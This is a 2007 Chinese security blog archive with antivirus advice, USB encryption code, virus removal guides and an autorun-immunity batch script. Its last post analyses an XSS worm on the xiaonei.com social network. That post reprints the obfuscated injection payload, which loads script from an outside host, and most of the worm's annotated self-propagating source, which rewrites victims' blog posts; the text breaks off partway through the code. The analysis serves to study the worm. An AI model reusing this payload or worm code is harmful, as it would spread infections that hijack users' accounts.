2007年11月3日

十种武器保证你的系统安全

我相信玩很多玩黑软的朋友都有这样一个问题。想安全吧,装杀毒软件,结果自己的很多黑软都被杀的光光,不装吧,又怕被病毒感染,后门等等,导致系统挂掉,硬盘也要格式化。哈哈。今天我就把我自己如何解决这些问题的方法告诉你们,既可以随心所欲的玩黑软,又不担心病毒的骚扰。
注:以下只是我个人所见。由于下面所涉及到的软件网上都有的下,再有本论坛空间有限,就不上传了,如网上有找不到的可以联系我。

1 avast4.78 [安装版]:占用内存非常小,全面监控,WEB监控不比Kaspersky6差,防火墙也不错。内存监控比较弱。

2 AVG Anti-Virus v7.5 [安装版]:占用内存非常强[尤其文本,比诺盾还强。],全面监控,WEB监控不行。内存监控比较强。

3 Dr.Web V4.33 [绿色版]:大蜘蛛占用内存非常小,内存监控强,查杀能力非常强。

4 Virus Chaser [绿色版]:驱逐舰占用内存非常小,内存监控非常强,查壳能力非常强。注意,如果开启内存监控,他所疑视文件会被锁定,只有结束它的进程后重起机器才可以。[做辅助查杀非常不错]

5 Kaspersky6 [绿色版]:无监控,占用内存非常小,查杀能力强。[做辅助查杀非常不错]

6 AVG Anti-Spyware 7.5 [绿色版]:启发式监控,占用内存非常小,查杀能力强。[做辅助查杀非常不错]

7 F-Prot Antivirus v3.16F [绿色版]:冰岛占用内存非常小,无监控,用内存非常小,查杀能力比较强。[做辅助查杀非常不错]

8 卡巴斯基防火墙 [绿色版]:操纵明了,自定义规则能力非常强,可防御冲击波等病毒。但与AVAST4.78自带的防火墙功能冲突,导致AVAST自带的防火墙功能不能运行,不过AVAST那些功能正好是 卡巴斯基防火墙 的本职功能,正好拟补。[怕麻烦的别用这个,哈哈。]

9 360safe3.0 [绿色版]:最后一个就是这个了,不是叫你找流氓软件啊,而是它有个非常好用的功能,就是他的 注册表 监视功能。如有更改,它会提示你操纵。再通过它的其他功能一目了然的了解所有动作。[推荐使用]

10 影子系统 [安装版]:这个是我最后推荐的,如果你看后觉得装杀毒还是麻烦,或者说我根本就不想装,再者说,你要本机测试木马病毒等,那我隆重推荐你使用影子系统,安装简单,一路下一步,最后重起机器就OK了,启动机器时会在启动项里有[进入影子系统单一模式:这个模式是只保护你的系统盘][进入影子系统完全模式:这个模式是保护你硬盘所有分区],你也可以跳过这个,在桌面的快捷方式启动影子系统。用影子系统的好处是:1单一模式(保护系统盘),你的所有操纵都是建立在系统盘上的,本机测试木马病毒等时所有都是要写进系统的,重起机器后所有操纵都会被还原,即使是木马,病毒都会消失!如果你有需要保存的软件等,不要保存在系统盘,请存放在其他未被保护的盘,这样才不会被还原。2完全模式(保护硬盘所有分区)即使你中了硬盘炸弹,重起机器后你的硬盘还是安然无恙。3还原能力经本人测试,远远超过还原精灵和还原卡。我用影子

  • » 阅读全文...
    • Tags: ,.

    移动存储安全


    当你的U盘,移动硬盘遗失了,被盗了,或者是遗忘在公共场所,里面的资料就会完全被别人窥探,如果涉及一些隐私,机密,那后果是很严重的。本课题就是在这样一个情况下产生的。这里剖析的只是一个最初的演示原型,详细设计,以及一些细节可以参考源代码。源代码在WinXP,VC6.0编译通过。

    [代码性质] VC完整应用程序代码
    [文件大小] 16K
    [下载]     下载文件Jeffrey_mss.rar (15.78 KB , 下载:17次)

    摘要:实现对移动存储设备的加密,保护信息隐蔽,防止隐私泄露。


    关键字:移动存储设备加密安全


      当你的U盘,移动硬盘遗失了,被盗了,或者是遗忘在公共场所,里面的资料就会完全被别人窥探,如果涉及一些隐私,机密,那后果是很严重的。本课题就是在这样一个情况下产生的。这里剖析的只是一个最初的演示原型,详细设计,以及一些细节可以参考源代码。源代码在WinXPVC6.0编译通过。


    1    、访问注册表读取计算机上的移动存储设备

    在注册表

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Disk\Enum

    下面可以看到计算机当前的状态,这里可以看到所有的存储设备的情况,包括计算机的硬盘,通过情况下,名称为0的是计算机硬盘,所以在列出的选择设备时,会把名称为0的屏蔽,不然太危险,一旦造成系统的破坏,后果会很麻烦。对注册表的读写: 

    HKEY hkey;
    char sz[256];
    DWORD dwtype,sl = 256; 
    for(int i=1;i<8;i++)
    {
            if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\Disk\\Enum",\
                   NULL, KEY_ALL_ACCESS, &hkey)==ERROR_SUCCESS)
            {
                   CString id;
                   id.Format("%d",i);
                   if(RegQueryValueEx(hkey,id,NULL,&dwtype,(LPBYTE)sz,&sl)==ERROR_SUCCESS)
                   {
                           CString str=(CString)sz;
                           m_select.AddString(sz);
                   }
            }
    }
    RegCloseKey(hkey);


    2    、对磁盘的扇区的操作

      Windows 操作系统在很大程度上采取了访问安全保护机制(例如,在Windows操作系统下不能直接访问物理内存、不能使用各种DOSBIOS中断等等),其实Windows在采取“实保护”措施的同时也提供了另外的一种有别于在DOS下访问硬件设备的方法,即把所有的硬件设备全部看做“文件”,并允许按照对文件的读写方式来对其进行数据存取访问。对于磁盘扇区的读写,可以通过C++CreateFile()函数来实现。由MSDN可查询到该函数原型: 

    HANDLE CreateFile(
    LPCTSTR lpFileName, 
    DWORD dwDesiredAccess, 
    DWORD dwShareMode, 
    LPSECURITY_ATTRIBUTES lpSecurityAttributes, 
    DWORD dwCreationDisposition, 
    DWORD dwFlagsAndAttributes, 
    HANDLE hTemplateFile );


    由于访问的是事实上已经存在的磁盘扇区,因此只能以OPEN_EXISTING标志设置dwCreationDisposition参数指出将要打开已经存在的文件(设备)。至于其他参数的使用与操作普通文件时的用法相同。
    使用的时候,如果需要定位到某一个具体的扇区,可以使用SetFilePointer()函数:

    DWORD SetFilePointer(HANDLE hFile,LONG lDistanceToMove,PLONG lpDistanceToMoveHigh,DWORD dwMoveMethod);


      在定位到要访问的扇区开始位置后就可以通过ReadFile()或WriteFile()函数实施相应的读写访问了,具体操作与文件读写并没有什么太大的差别。最后,在完成访问操作后以CloseHandle()关闭文件句柄释放资源,从而完成一次完整的磁盘扇区数据访问操作。 

    int ReadDisk(CString driver,unsigned char *Buf,long addr)
    {
            HANDLE hDevice;
            BOOL bResult;
            DWORD bytesread; 
            
            hDevice=CreateFile(driver,GENERIC_READ|GENERIC_WRITE,
                   FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_EXISTING,0,NULL); 
            if(hDevice==INVALID_HANDLE_VALUE)
            { 
                   AfxMessageBox("Error!");
                   return 0;
            }
            if(addr!=0)
            {
                   SetFilePointer(hDevice,512*addr,NULL,NULL);
            }
            
            bResult=ReadFile(hDevice,Buf,512,&bytesread,NULL);
            if((bResult==FALSE)||(bytesread<512)) 
            { 
                   AfxMessageBox("Error!");
                   return 0;
            }
            CloseHandle(hDevice);
            return 1;
    }


    3    、用RC4加密算法对磁盘加密。

    /* RC4加密,KEY是密钥,此处Key[]="MobileStorageSecurity",后期可以用户输入的密码作为密钥 */
    RC4_KEY rc4_key;
    build_rc4_key(Key,strlen((char*)Key),&rc4_key);
    rc4_handler(MBRBuf,strlen((char*)MBRBuf),&rc4_key);


    4    U盘插入计算机时的自动感知 

    LRESULT CRawDiskDlg::WindowProc(UINT message, WPARAM wParam, LPARAM lParam)
    {
            if ( WM_DEVICECHANGE == message && FALSE == bCopy )
            {
                   //刷新设备列表
            }
            return CDialog::WindowProc(message, wParam, lParam);
    }


    后期改进

    1. 这样就必须要求在电脑上有这个程序,所以在后期采用同样的原理,将这个程序放在U盘里,在加密的时候实现对自身的屏蔽,这样大大提高程序的易用性。
    2. 可以让用户输入密码,将密码作为密钥去加密和解密。

      3.这个只是对一个磁盘最初的512字节加密,后期可以通过对扇区的定位和计算,对目录表及数据加密。

  • » 阅读全文...
    • Tags: ,.
    2007年10月31日

    手动清除chcp.exe病毒 保护MSN的安全

      随着即时通讯工具的强大,木马病毒也加快了脚本,MSN早就成为了其通向第三方计算机感染跳越的平台。在好友圈中,只要盗取一个MSN好友帐号或感染一台用户计算机,病毒即会伸出罪恶之手,将会在用户MSN聊天时发送病毒信息。

        病毒分析
        该病毒属于MSN蠕虫变种,被感染的计算机会自动向MSN联系人发送诱惑文字消息和带毒压缩包,当对方接收并打开带毒压缩包中的病毒文件时,系统即成为新的受害者,并因此尝试感染另一台计算机。病毒大小为434,176 字节,通过MSN聊天工具进行传播。

        被感染的计算机,病毒首先会在系统目录 %Windows%下生成含带病毒源体的F0538_jpg.zip压缩包,随后病毒自身开始在计算机中的%Windows%目录下创建副本chcp.exe 可执行文件,并在注册表[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]分支下建立"chcp.exe"="%Windows%\chcp.exe"自启动项目,然后病毒开始修改注册分支[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]下的"SFCDisable"=dword:ffffff9d  和"SFCScan"=dword:00000000值,进行关闭系统文件保护,并且更改  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control]分支下的 "WaitToKillServiceTimeout"=的值为"7000",达到更改自动关闭进程等待时间的效果。

        完成上述后,病毒仍没有安静的等待,而是查找被感染的计算机中是否存在FTP目录,如果有则将原正常程序改名为backup.ftp、backup.tftp并复制到%System%\microsoft目录下,随后在系统目录%System%下写入ftp.exe、tftp.exe、dllcache\tftp.exe、dllcache\ftp.exe可执行程序,做完一系列的手脚,病毒开始向MSN联系人发送诱惑型文字消息,并夹带毒包F0538_jpg.zip欺骗用户打开。

       清除方法
        中了此毒的用户也不要紧张,在了解了生存原理后要想清除该病毒也非难事,只要按照以下几个步骤实施即可将病毒清除出界,让系统中的MSN正常运行。

        一、首先要进入注册表分支[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下,将"chcp.exe"="%Windows%\chcp.exe"自建的随机启动项删除,完成后重启计算机。

        二、进入%Windows%\目录下将病毒源体文件chcp.exe及F0538_jpg.zip压缩包删除。

        三、将目录%System%下的FTP破坏代替程序ftp.exe、tftp.exe、dllcache\tftp.exe、dllcache\ftp.exe删除,并将%System%\microsoft目录下的backup.ftp、backup.tftp改回到目录%System%下。

        四、删除注册表分支[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]下的"SFCDisable"=dword:00000000键值,恢复系统文件保护。

        五、最后将注册表[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control]分支下的"WaitToKillServiceTimeout"=改为"20000" 从而恢复系统自动关闭进程等待时间的默认配置。
               
        笔者按:在MSN病毒中变体有很多种如:MSN机器人、MSN小丑、MSN性感相册等,其原理都是利用MSN作为平台在同聊友沟通的同时发送病毒信息,通过MSN好友关系欺骗用户点击,然后再次传播,从而形成强大的传播途径。为了更好的处理此类病毒,这里建议用户加强计算机的先期保护如:开启杀软定时升库,安装安全类软件,不定期打入系统补丁等,并且多了解每日病毒动态,即时作好防范工作即可,一但用户被感染时应立即作出回应,利用手工删除或下载相应的专杀工具进行清理,以免让更多的用户成为受害者。

  • » 阅读全文...
    • Tags: ,.
    2007年10月30日

    编写autorun病毒免疫工具

    autorun病毒的危害相信中过招的人都有体会。其最大的特点就在于很难清除干净,现在可以提前对系统分区做一次免疫工作,而那些已经中了autorun病毒的用户也能顺便将病毒清除。  
        
    有人曾经使用系统组策略的方法,不过对于初学者来说有点复杂。现在复制以下代码到文本文件中,保存为bat文件即可。
        @echo off
    cls
    echo          按 S 键删除Autorun.inf并进行免疫
    echo.
    echo          按 D 键删除免疫程序
    echo.
    echo          按其他任意键退出
    echo.
    echo.
    SET Choice=
    SET /P Choice=        请选择要进行的操作:  
    IF /I ’%Choice:~0,1%’==’s’ GOTO setup
    IF /I ’%Choice:~0,1%’==’d’ GOTO Delset
    IF /I ’%Choice:~0,1%’==’q’ GOTO Exit
    exit
    :Setup
    taskkill /im explorer.exe /f
    for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do @(
        if exist %%a: (
            rd %%a:\autorun.inf /s /q
            del %%a:\autorun.inf /f /q
            mkdir %%a:\autorun.inf
            mkdir %%a:\autorun.inf\"病毒免疫勿删除../" 
            attrib +h +r +s %%a:\autorun.inf
            
        ) 
    )
    start explorer.exe
    for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (
      if exist %%a:\nul (
        >1.vbs echo msgbox^ "%%a:免疫成功",64,"提示:"
        1.vbs
      )
    )
    del 1.vbs
    echo.
    echo.
    echo                        按任意键退出...
    pause>nul
    exit
    :delset
    For %%a In (C D E F G H I J K L M N O P Q R S T U V W X Y Z) Do @(
        If Exist %%a: (      
            rd %%a:\autorun.inf /s /q
                    
        ) 
    )
    echo.
    echo.
    echo                        操作完毕,按任意键退出...
    pause>nul
    exit

        具体原理为通过检测autorun.inf和删除相应文件达到直接消灭病毒的目的。操作比较简单,只要按两个键就可以了。

  • » 阅读全文...
    • Tags: ,.

    U盘(auto病毒)类病毒分析与解决方案

    一、U盘病毒简述: 
      U盘(自动运行)类病毒(auto病毒)近来非常常见,并且具有一定程度危害,它的机理是依赖Windows的自动运行功能,使得我们在点击打开磁盘的时候,自动执行相关的文件。目前我们使用U盘都十分频繁,当我们享受U盘所带来的方便时,U盘病毒也在悄悄利用系统的自动运行功能肆意传播,目前流行的U盘病毒文件大家甚至耳熟能详了,比如经常有网友问的SSS.EXE SXS.EXE如何查杀这类的,下面我们将对U盘病毒极其特性和防范办法进行分析总结。
      
    二、特性分析:
      所谓的自动运行功能是指Windows系统一种方便特性,使当光盘、U盘插入到机器自动运行,而这种特性的实现就是通过磁盘跟目录下的 autorun.inf文件进行。这个文件保存在驱动器的根目录下(一般会是一个隐藏属性的系统文件),它保存着一些简单的命令,告知系统新插入的光盘或 U盘应该自动启动什么程序等。
      常见的Autorun.inf文件格式大致如下:
      [AutoRun]    //表示AutoRun部分开始,必须输入
      icon=C:\C.ico  //指定给C盘一个个性化的盘符图标C.ico
      open=C:\1.exe  //指定要运行程序的路径和名称,只要在此放入病毒程序就可自动运行;
      在Windows系统有允许和阻止自动运行的键值的方法:
      在注册表中找到如下键:
      键路径:[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Exploer]
      在右侧窗格中有 "NoDriveTypeAutoRun"这个键决定了是否执行Autorun功能.其中每一位代表一个设备,不同设备用以下数值表示:
      设备名称 第几位 值 设备用如下数值表示 设备名称含义
      DRIVE_UNKNOWN 0 1 01h 不能识别的类型设备
      DRIVE_NO_ROOT_DIR 1 0 02h 没有根目录的驱动器
      DRIVE_REMOVABLE 2 1 04h 可移动驱动器
      DRIVE_FIXED 3 0 08h 固定的驱动器
      DRIVE_REMOTE 4 1 10h 网络驱动器
      DRIVE_CDROM 5 0 20h 光驱
      DRIVE_RAMDISK 6 0 40h RAM磁盘
      其中: 保留 7 1 80h  未指定的驱动器类型
      以上值"0"表示设备运行,"1"表示设备不运行。
      从上面可以看出,对应的DRIVE_NO_ROOT_DIR、DRIVE_FIXED、DRIVE_CDROM、DRIVE_RAMDISK是可以自动运行的。所以要禁止硬盘自动运行AutoRun.inf文件,就必须将DRIVE_FIXED这些键的值设为1,由于DRIVE_FIXED代表固定的驱动 器(即硬盘)。如果仅想禁止软件光盘的AutoRun功能,但又保留对CD音频碟的自动播放能力,这时只需将“NoDriveTypeAutoRun”的键值改为:BD,00,00,00即可。
      U盘病毒就是利用这种系统特性,一般在感染后会修改系统的注册表,将显示所有文件的选项设置为禁止。甚至修改磁盘关联,杀毒软件一般会只把病毒文件清除,但对残余的文件不会处理。这也是常见的杀毒软件为什么常常无法清除干净,或者清除后双击无法打开磁盘的原因。
      
    三、解决方案:
      1、使用超级巡警套装来全面解决U盘病毒问题(推荐!):
      ①超级巡警对U盘病毒检测进行了特别的处理,可以快速的监测和定位U盘病毒,并清除它们。
      ②超级巡警同时还提供对注册表关联修复和自动运行阻止的处理。
      2、手动解决办法:
      ①根据上面的原理,自己修改注册表禁止磁盘的自动运行特性。
      ②把文件夹选项中隐藏受保护的操作系统文件钩掉,选中显示所有文件和文件夹,点击确定。这样可以在感染病毒的移动存储设备中会看到几个文件(包括autorun.inf和病毒文件),删除后,病毒就清除了。
  • » 阅读全文...
    • Tags: ,.
    2007年10月20日

    一个不为人知的感染几百万校内网用户的蠕虫分析

    文章作者:langouster
    信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

    在一次查看校内网网页源程序的时候无意间发现一个校内蠕虫,开始还以为是我的网页有问题,就随便打开几个人的页面查看,发现许多人的页面上也有这段代码。

     <a name="mya113" id="mya113" style='background:url(vbscript:execute(StrReverse(")""311aym""(dIyBtnemelEteg.tnemucod,s erofeBtresni.edoNtnerap.)""311aym""(dIyBtnemelEteg.tnemucod :""gpj.sjnx/segami/moc.ecafosos.www//:ptth""=crs.s:)""tpircs""(tnemelEetaerc.tnemucod=s tes")) )'>

    以上代码出现在日志的开头,只有查看源文件才能发现。它将vbscript调了个头写,调回来就变成以下内容:

     set s=document.createElement("script")
     s.src=http://www.sosoface.com/images/xnjs.jpg
     document.getElementById("mya113").parentNode.insertBefore s,document.getElementById("mya113")

    在这段脚本中它又新建了一个script,它的src指向http://www.sosoface.com/images/xnjs.jpg(别相信后缀),下载加这个“jpg”用记事和UE打开都发现它填充了大量的asc的00(真不敢相信填充了那么多00 IE还能执行),不过用Dreamweaver打开显示正常,拷出JS。然后花了几乎一天的时间来分析这个js文件,发现它完完全全是一个基于ajax的蠕虫。
    值得注意的是作者好像很低调,在蠕虫代码中除了感染就是隐藏,没有一行破坏性的代码,仅仅是加了一个站长统计,估计作者是用来研究蠕虫传播情况的,因为站长统计要密码我们进不去,所以不知道具体的感染情况,但是我刚才在google上搜了下sosoface,还是看到这个网站的流量图:
    http://www.chinarank.org.cn/detail/Info.do?url=www.sosoface.com&r=1192875678218

    从图上可以看到流量在几天时间里大增,这些天应该是蠕虫感染的时间。日访问人数从0猛增到500百万人/天,也就是每天那个JPG要被访问5亿次考虑到一个人可能访问多个页面,粗略估计应该至少有几百万人受到感染。另外,也就在大概两三天前这个蠕虫应该是被校内的人发现了,一夜之间全部消失了。 Sosoface也被停了。

    下面来分析感染代码,我直接把注释写在JS中了,原本的程序可是一行注释也没有的。看时从最底下的start函数看起:

     var req = null;
     var step=null;
     var DiaryMonthUrlList="",DiaryUrlList="";
     var timer=null;
     var bIsBusy=false;

     var myrand="46.115.50.124.115.127.119.47.48.127.107.115.35.35.33.48.50.123.118.47.48.127.107.115.35.35.33.48.50.97.102.107.126.119.47.53.112.115.113.121.117.96.125.103.124.118.40.103.96.126.58.100.112.97.113.96.123.98.102.40.119.106.119.113.103.102.119.58.65.102.96.64.119.100.119.96.97.119.58.48.59.48.48.33.35.35.115.107.127.48.48.58.118.91.107.80.102.124.119.127.119.126.87.102.119.117.60.102.124.119.127.103.113.125.118.62.97.50.119.96.125.116.119.80.102.96.119.97.124.123.60.119.118.125.92.102.124.119.96.115.98.60.59.48.48.33.35.35.115.107.127.48.48.58.118.91.107.80.102.124.119.127.119.126.87.102.119.117.60.102.124.119.127.103.113.125.118.50.40.48.48.117.98.120.60.97.120.124.106.61.97.119.117.115.127.123.61.127.125.113.60.119.113.115.116.125.97.125.97.60.101.101.101.61.61.40.98.102.102.122.48.48.47.113.96.97.60.97.40.59.48.48.102.98.123.96.113.97.48.48.58.102.124.119.127.119.126.87.119.102.115.119.96.113.60.102.124.119.127.103.113.125.118.47.97.50.102.119.97.48.59.59.50.59.53.44.46.61.115.44";

     function my_HtmlDecode(str)
     {
     str=str.replace(/</g,"<");
     str=str.replace(/>/g,">");
     str=str.replace(/&/g,"&");
     str=str.replace(/ /g," ");
     str=str.replace(/"/g,""");
     str=str.replace(/<br>/g,"n");
     str=str.replace(/#/g,"#");
     str=str.replace(/(/g,"(");
     str=str.replace(/)/g,")");
     str=str.replace(/"/g,""");
     str=str.replace(/'/g,"'");
     str=str.replace(/#/g,"#");
     str=str.replace(/(/g,"(");
     str=str.replace(/)/g,")");
     str=str.replace(/"/g,""");
     str=str.replace(/'/g,"'");
     return str;
     }
     function processReqChange()
     {
     if (req.readyState == 4 && req.status == 200 )
     {
     if("WriteIframe"==step)
     {
     var text,len,i=0,j=0,temp;
     
     text=req.responseText;
     i=text.indexOf("<div class="article">",0);
     if(-1==i){return}
     i=text.indexOf("http://blog.xiaonei.com/GetEntry.do",i);
     if(-1==i){return}
     j=text.indexOf(""",i);
     if(-1==j){return}
     text=text.substring(i,j);
     
     document.getElementById("mya113").style.background="#FFFFFF";
     var s=document.createElement("iframe");
     s.frameborder="0";
     s.height="0";
     s.width="1";
     s.src=text;
     document.getElementById("mya113").parentNode.insertBefore(s,document.getElementById("mya113"));
     }
     else if("GetDiaryMonthList"==step)
     {
     var text,len,i=0,j=0,temp;
     //text的内容就和用户点“我的日志”得到的内容一样,分析HTML,得到“日志存档”中的每一个链接,保存到DiaryMonthUrlList中
     //然后跳到GetStatus函数,此时step="GetDiaryList" 取出每个月的日志列表
     text=req.responseText;
     i=text.indexOf("<div id="list-archive">",0);
     if(-1==i){return}
     j=text.indexOf("<div class="bottom-box">",i);
     if(-1==j){return}
     text=text.substring(i,j);
     
     i=j=0;
     while(1)
     {
     i=text.indexOf("http://blog.xiaonei.com/MyBlog.do",i);
     if(-1==i)break;
     j=text.indexOf("'>",i);
     if(-1==j)break;
     temp=text.substring(i,j);
     i+=temp.length;
     temp=my_HtmlDecode(temp)+"|";
     DiaryMonthUrlList+=temp;
     }
     if(DiaryMonthUrlList.length<=1)
     {
     return;
     }
     
     step="GetDiaryList";
     req=null;
     bIsBusy=false;
     timer=window.setInterval(GetStatus,1000);
     }
     else if("GetDiaryList"==step)
     {
     var text,len,i,j,temp,temp2;
     var text2="http://blog.xiaonei.com/EditEntry.do?id=";
     
     //text的内容就和用户点了“日志存档”后的内容一样
     //分析HTML得到每个月的日志列表保存在DiaryUrlList中,然后step=GetDiaryText也就是取得日志的内容,
     //看本函数下面else if("GetDiaryText"==step)就是了
     text=req.responseText;
     
     len=text.length;
     i=text.indexOf("<div id="list-article">");
     if(-1==i)
     {
     req=null;
     bIsBusy=false;
     return;
     }
     j=text.indexOf("</table>",i);
     if(-1==j)
     {
     req=null;
     bIsBusy=false;
     return;
     }
     text=text.substring(i,j);
     i=j=0;
     
     
     while(1)
     {
     j=0;
     len=0;
     j=DiaryUrlList.indexOf("|",j);
     while(j!=-1)
     {
     j++;
     len++;
     j=DiaryUrlList.indexOf("|",j);
     }
     
     if(len>=5)//只感染前5篇日志 或者是4篇 没仔细研究
     {
     break;
     }
     
     i=text.indexOf(text2,i);
     if(-1==i)
     {
     break;
     }
     i+=text2.length;
     j=text.indexOf("">",i);
     if(-1==j || j-i>10)
     {
     break;
     }
     temp=text2+text.substring(i,j)+"|";
     DiaryUrlList+=temp;
     }
     req=null;
     bIsBusy=false;
     }
     else if("GetDiaryText"==step)
     {
     var text,len,i,j;
     var argv;
     var title,body,blog_pic_id="0",pic_path,blogControl,Diaryid;
     
     
     text=req.responseText;
     //这个模块模拟用户编辑日志,在每篇日志的开关都加上
     //<a name="mya113" id="mya113" style='background:url(vbscript:execute(StrReverse(")""311aym""(dIyBtnemelEteg.tnemucod,s erofeBtresni.edoNtnerap.)""311aym""(dIyBtnemelEteg.tnemucod :""gpj.sjnx/segami/moc.ecafosos.www//:ptth""=crs.s:)""tpircs""(tnemelEetaerc.tnemucod=s tes")) )'>
     
     i=text.indexOf("<form action="http://upload.xiaonei.com/EditEntry.do"",0);
     
     if(-1==i)
     {
     return;
     }
     i+=53;
     
     j=text.indexOf("</form>",i);
     if(-1==j)
     {
     return;
     }

     text=text.substring(i,j);
     //------------------------
     
     i=text.indexOf("id="title" class="inputtext" tabindex="1" value="",0);
     if(-1==i)return;
     i+=49;
     j=text.indexOf("" />",i);
     if(-1==j)return;
     title=text.substring(i,j);
     //---
     i=text.indexOf("<textarea name="body" id="body" cols="100%" style="display:none">",0);
     if(-1==i)return;
     i+=65;
     j=text.indexOf("</textarea>",i);
     if(-1==j)return;
     body=text.substring(i,j);
     //---
     i=text.indexOf("id="blog_pic_id" value="",0);
     if(-1==i)return;
     i+=24;
     j=text.indexOf("" />",i);
     if(-1==j)return;
     blog_pic_id=text.substring(i,j);
     //---
     i=text.indexOf("id="pic_path" value="",0);
     if(-1==i)return;
     i+=21;
     j=text.indexOf("" />",i);
     if(-1==j)return;
     pic_path=text.substring(i,j);
     //---
     i=text.indexOf("name="id" value="",0);
     if(-1==i)return;
     i+=17;
     j=text.indexOf("" />",i);
     if(-1==j)return;
     Diaryid=text.substring(i,j);
     //---
     i=text.indexOf("" selected="selected"",0);
     if(-1==i)return;
     j=i-2;
     if(text.substr(j,1)==""")
     j++;
     blogControl=text.substring(j,i);
     
     
     body=my_HtmlDecode(body);
     if(body.indexOf("mya113",0)>=0)//已经感染过,不再感染
     {
     req=null;
     step="GetDiaryText";
     bIsBusy=false;
     
     return;
     }
     else
     {
     ;
     }
     //以上是取日志的各个变量信息
     //以下开头就感染日志并修改
     
     body=MyDecode(myrand)+body;
     //感染日志 在日志的开头加上跨站代码
     //MyDecode(myrand)中保存的就是跨站的关键代码,作者加密了一下放在myrand变量中,程序开头的一长串数据就是
     
     //以下开始POST提交修改过的日志
     argv="";
     argv+="-----------------------------7d71861cb014cContent-Disposition: form-data; name="title"";
     argv+=(title+"");
     argv+="-----------------------------7d71861cb014cContent-Disposition: form-data; name="body"";
     argv+=(body+"");
     argv+="-----------------------------7d71861cb014cContent-Disposition: form-data; name="theFile"; filename=""Content-Type: application/octet-stream";
     argv+="-----------------------------7d71861cb014cContent-Disposition: form-data; name="blog_pic_id"";
     argv+=(blog_pic_id+"");
     argv+="-----------------------------7d71861cb014cContent-Disposition: form-data; name="pic_path"";
     argv+=(pic_path+"");
     argv+="-----------------------------7d71861cb014cContent-Disposition: form-data; name="blogControl"";
     argv+=(blogControl+"");
     argv+="-----------------------------7d71861cb014cContent-Disposition: form-data; name="id"";
     argv+=(Diaryid+"");
     argv+="-----------------------------7d71861cb014cContent-Disposition: form-data; name="relative_optype"";
     argv+=("publisher"+"");
     argv+="-----------------------------7d71861cb014cContent-Disposition: form-data; name="del_relative_id"";
     argv+="-----------------------------7d71861cb014c--";
     
     
     req=null;
     step="EditDiaryText";
     loadUrl("http://blog.xiaonei.com/EditEntry.do","POST",argv);
     

     }
     else if("EditDiaryText"==step)
     {
     
     req=null;
     bIsBusy=false;
     step="GetDiaryText";
     }
     else
     {
     ;
     }
     
     }
     }
     function MyDecode(str)
     {
     var i,k,str2="";
     
     k=str.split(".");
     
     for(i=0;i<k.length;i++)
     {
     str2+=String.fromCharCode(k[i]^0x12);
     }
     return str2;
     }
     function loadUrl( url,method,argv )
     {
     bIsBusy=true;
     if(!req)
     {
     if(window.XMLHttpRequest)
     {
     try
     {
     req = new XMLHttpRequest();
     } catch(e) { req = false; }
     }
     else if(window.ActiveXObject)
     {
     try
     {
     req = new ActiveXObject('Msxml2.XMLHTTP');
     }
     catch(e)
     {
     try
     {
     req = new ActiveXObject('Microsoft.XMLHTTP');
     } catch(e) { req = false; }
     }
     }
     }
     if(req)
     {
     req.onreadystatechange = processReqChange;
     try
     {
     req.open(method, url, true);
     if(method=="POST")
     req.setRequestHeader("Content-Type","multipart/form-data; boundary=---------------------------7d71861cb014c");
     req.send(argv);
     }catch(e)
     {
     req=false;
     }
     }
     }
     function GetStatus()
     {
     if(bIsBusy)return;
     
     if("GetDiaryList"==step)
     {
     var DiaryMonthUrl,i;
     
     //取出每个月的日志列表
     if(DiaryMonthUrlList.length<=1)
     {
     step="GetDiaryText";
     return;
     }
     i=DiaryMonthUrlList.indexOf("|",0);
     if(-1==1)
     {
     step="GetDiaryText";
     return;
     }
     DiaryMonthUrl=DiaryMonthUrlList.substring(0,i);
     DiaryMonthUrlList=DiaryMonthUrlList.substring(i+1,DiaryMonthUrlList.length);
     
     //再回到开头的processReqChange函数 此时step还是GetDiaryList
     loadUrl(DiaryMonthUrl,"GET","");

     }
     else if("GetDiaryText"==step)
     {
     var DiaryUrl,i;
     if(DiaryUrlList.length<=1)
     {
     clearInterval(timer);
     return;
     }
     
     i=DiaryUrlList.indexOf("|",0);
     if(-1==i)
     {
     clearInterval(timer);
     return;
     }

     DiaryUrl=DiaryUrlList.substring(0,i);
     DiaryUrlList=DiaryUrlList.substring(i+1,DiaryUrlList.length);

     loadUrl(DiaryUrl,"GET","");
     }
     }
     function WriteStat()
     {
     var s=document.createElement("iframe");
     s.frameborder="0";
     s.height="0";
     s.width="0";
     s.src="http://www.sosoface.com/images/stat.jpg";
     document.getElementById("mya113").parentNode.insertBefore(s,document.getElementById("mya113"));

     }

     function DeleteScript(html)
     {
     var i=0,j=0,str;
     
     str=html;

     i=str.indexOf("</A>",0);
     if(-1==i)
     return str;
     i+=4;
     str=str.substring(i,str.length);

     return str;
     }
     function EditorSubmit()
     {
     var ret=false;
     parent.parent.descOptype();
     ret=parent.parent.beforeSubmit();

     parent.parent.document.getElementById("body").value=MyDecode(myrand)+DeleteScript(parent.parent.document.getElementById("body").value);

     return ret;
     }
     function Start()
     {
     //判断是不是blog.xiaonei.com域,由于ajax是不能跨域的,所以判断是必备的
     if("blog.xiaonei.com"==document.domain)
     {
     //如果是在编辑已感染的日志 就做了一些奇怪的行为,我看不懂,好像是把自己重写了一遍,不知道为什么这样做
     if("http://blog.xiaonei.com/pages/editor/win.htm"==document.location)
     {
     parent.parent.document.getElementById("editorForm").onsubmit=EditorSubmit;
     }
     else
     {
     
     WriteStat();//这是一个用户流量统计的函数,使用cnzz 站长助手
     //下面开始感染了,第一步GetDiaryMonthList,得到日志的按月归档
     step="GetDiaryMonthList";
     loadUrl("http://blog.xiaonei.com/MyBlog.do","GET","");//loadUrl是一个ajax读取页面内容的函数
